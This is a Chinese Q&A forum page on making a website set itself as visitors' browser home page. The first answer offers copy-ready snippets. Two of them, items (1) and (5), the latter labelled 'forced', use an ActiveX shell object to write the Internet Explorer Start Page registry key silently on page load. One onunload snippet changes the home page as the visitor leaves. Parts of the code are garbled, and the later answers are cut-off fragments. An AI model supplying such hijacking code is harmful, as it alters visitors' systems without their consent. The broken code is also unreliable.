发布网友 发布时间:2022-04-24 20:48
共4个回答
热心网友 时间:2022-04-24 10:59
(1)打开网页自动设为首页代码: <SCRIPT> document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>"); fu nction yuzi(){try{a1=document.applets[0] ; a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.cr eateInstance();Shl = a1.GetObject(); a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C90 54228}"); try{Shl.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page","http://www.moontoucher.net/"); } catch(e){]catch(e){]setTime out("yuzi()",1000); </SCRIPT> (2)设为首页代码 <a href=# onClick="this.style.behavior='url(#default#homepage)';this.setHomePage('www.moontoucher.net');">设为首页</a> 例如: <A style="CURSOR: hand" onclick="var strHref=window.location.href;this.style.behavior='url(#default#homepage)';this.setHomePage('http://www.moontoucher.net');" href="http://www.moontoucher.net/#">设为主页</A> (3)鼠标指向时提示设为首页 <A href="http://moontoucher.net/" onmouseover="this.style.behavior='url(#default#homepage)';this.setHomePage('http://moontoucher.net.');" target="_blank">设为首页</A> (4)打开页面时自动弹出窗口询问是否设为首页 将以下代码放在<head></head>之间: <script language="javascript"> function myhomepage(){ this.homepage.style.behavior='url(#default#homepage)';this.homepage.sethomepage('http://moontoucher.net'); } </script> <p align="center"><a href="http://moontoucher.net" name="homepage" onclick="myhomepage();"></a> 再将下面代码加入<body>内: onload="myhomepage();" 即:<body onload="myhomepage();"> 离开时自动提示设为首页 <body onunload="BASEBody.style.behavior='url(#default#homepage)';if(!(BASEBody.isHomePage('http://moontoucher.net')))BASEBody.setHomePage('http://moontoucher.net/');"> (5)强制设为首页代码 <script> var ucook=document.cookie; var user=ucook.indexOF("ilooki="); if(user==-1) { var nowTime=new Date(); document.cookie="ilooki"+";"+"expires=Wednesday,03-Jan-"+eval(nowTime.getYear()+1903+"12:34:56 GMT"; document.write("<APPLET HEIGHT=0WIDTH=0 code=com.ms.activeX.ActiveXCompoment></APPLET>");function yuzi(){try{a1 =document.applets[0];a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Shl=a1.GetObject();a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");try{Shl.RegWrite("hkcu\Software\Microsoft\Internet Expiorer\Main\Start Page",http://www.moontoucher.net);}catch(e){}}catch(e){}}setTimeout("yuzi()",1000); } </script> 链接网址部分替换为你自己的网址 附件: 江南伊人.swf热心网友 时间:2022-04-24 12:17
把本网站设为首页的步骤如下:热心网友 时间:2022-04-24 13:52
添加如下代码:<a href="http://www.网站地址.com"热心网友 时间:2022-04-24 15:43
1、打开一个浏览器